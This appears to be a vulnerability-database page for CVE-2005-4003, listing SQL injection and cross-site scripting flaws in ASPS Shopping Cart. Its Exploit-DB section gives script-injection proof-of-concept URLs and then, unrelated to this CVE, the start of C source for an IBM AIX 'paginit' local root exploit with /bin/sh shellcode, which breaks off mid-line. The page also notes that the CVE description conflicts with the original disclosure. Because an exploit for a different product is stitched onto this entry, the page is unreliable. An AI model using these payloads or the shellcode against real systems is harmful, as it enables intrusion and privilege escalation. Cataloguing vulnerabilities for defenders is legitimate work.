CVE-2005-4003
Published: 2005-12-05
Priority P3 · 35 · high · 7.5 CVSS 2.0
CVSS vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.05% (60.0th percentile)
Multiple SQL injection vulnerabilities in Absolute Shopping Package Solutions (ASPS) Shopping Cart Professional 2.9d and earlier, and Lite 2.1 and earlier, allow remote attackers to execute arbitrary SQL commands via the (1) srch_product_name parameter to adv_search.asp and (2) b_search parameter to bsearch.asp. NOTE: the original disclosure was specifically only for an XSS issue, but the CVE description was for SQL injection. Since the original disclosure, SQL injection vectors have been reported. This CVE might be REJECTed or significantly altered pending additional information.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| asps | shopping_cart | — | — |
| asps | shopping_cart | — | — |
No detection rules found.
Exploit-DB
ASPS Shopping Cart Lite 2.1/Professional 2.9 d - 'adv_search.asp?srch_product_name' Cross-Site Scripting
exploitdb·2005-12-03
---
source: https://www.securityfocus.com/bid/15694/info
ASPS Shopping Cart is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/products/adv_search.asp?srch_product_name=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&srch_product_price1=&srch_product_price2=&srch_product_stocknumber=&srch_product_category=&adva
Exploit-DB
ASPS Shopping Cart Lite 2.1/Professional 2.9 d - 'bsearch.asp?b_search' Cross-Site Scripting
exploitdb·2005-12-03
---
source: https://www.securityfocus.com/bid/15694/info
ASPS Shopping Cart is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site.
http://www.example.com/products/bsearch.asp?b_search=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&x=12&y=7
Exploit-DB
AIX 5.2 - 'paginit' Local Privilege Escalation
exploitdb·2005-06-14
---
/*
*
* IBM AIX paginit root exploit
*
* I just wanted to play with PowerPC (Tested on 5.2)
*
* intropy (intropy caughq.org)
*
*/
#include
#include
#include
#include
#define DEBUG 1
#define BUFFERSIZE 8000
#define EGGSIZE 4003
#define NOP 0x60
#define ADDRESS 0x2ff22fff-EGGSIZE
/* lsd */
char shellcode_binsh[] =
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" /* crorc cr6,c
No writeups or analysis indexed.